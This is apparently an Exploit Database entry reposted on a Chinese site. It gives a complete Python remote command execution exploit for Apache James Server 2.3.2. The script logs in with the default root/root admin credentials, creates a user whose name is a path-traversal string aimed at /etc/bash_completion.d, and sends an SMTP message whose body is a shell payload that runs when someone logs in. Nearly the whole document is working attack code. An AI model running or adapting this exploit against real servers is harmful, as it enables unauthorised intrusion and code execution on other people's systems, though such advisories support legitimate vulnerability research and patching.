Apache James Server 2.3.2 – Remote Command Execution

• Exploit Database
• 14 阅读

• 作者： Jakub Palaczynski
  日期： 2014-12-10
• 类别：

  • remote
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/35513/

• #!/usr/bin/python
  #
  # Exploit Title: Apache James Server 2.3.2 Authenticated User Remote Command Execution
  # Date: 16\10\2014
  # Exploit Author: Jakub Palaczynski, Marcin Woloszyn, Maciej Grabiec
  # Vendor Homepage: http://james.apache.org/server/
  # Software Link: http://ftp.ps.pl/pub/apache/james/server/apache-james-2.3.2.zip
  # Version: Apache James Server 2.3.2
  # Tested on: Ubuntu, Debian
  # Info: This exploit works on default installation of Apache James Server 2.3.2
  # Info: Example paths that will automatically execute payload on some action: /etc/bash_completion.d , /etc/pm/config.d
  
  import socket
  import sys
  import time
  
  # specify payload
  #payload = 'touch /tmp/proof.txt' # to exploit on any user 
  payload = '[ "$(id -u)" == "0" ] && touch /root/proof.txt' # to exploit only on root
  # credentials to James Remote Administration Tool (Default - root/root)
  user = 'root'
  pwd = 'root'
  
  if len(sys.argv) != 2:
  sys.stderr.write("[-]Usage: python %s <ip>\n" % sys.argv[0])
  sys.stderr.write("[-]Exemple: python %s 127.0.0.1\n" % sys.argv[0])
  sys.exit(1)
  
  ip = sys.argv[1]
  
  def recv(s):
  s.recv(1024)
  time.sleep(0.2)
  
  try:
  print "[+]Connecting to James Remote Administration Tool..."
  s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  s.connect((ip,4555))
  s.recv(1024)
  s.send(user + "\n")
  s.recv(1024)
  s.send(pwd + "\n")
  s.recv(1024)
  print "[+]Creating user..."
  s.send("adduser ../../../../../../../../etc/bash_completion.d exploit\n")
  s.recv(1024)
  s.send("quit\n")
  s.close()
  
  print "[+]Connecting to James SMTP server..."
  s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  s.connect((ip,25))
  s.send("ehlo team@team.pl\r\n")
  recv(s)
  print "[+]Sending payload..."
  s.send("mail from: <'@team.pl>\r\n")
  recv(s)
  # also try s.send("rcpt to: <../../../../../../../../etc/bash_completion.d@hostname>\r\n") if the recipient cannot be found
  s.send("rcpt to: <../../../../../../../../etc/bash_completion.d>\r\n")
  recv(s)
  s.send("data\r\n")
  recv(s)
  s.send("From: team@team.pl\r\n")
  s.send("\r\n")
  s.send("'\n")
  s.send(payload + "\n")
  s.send("\r\n.\r\n")
  recv(s)
  s.send("quit\r\n")
  recv(s)
  s.close()
  print "[+]Done! Payload will be executed once somebody logs in."
  except:
  print "Connection failed."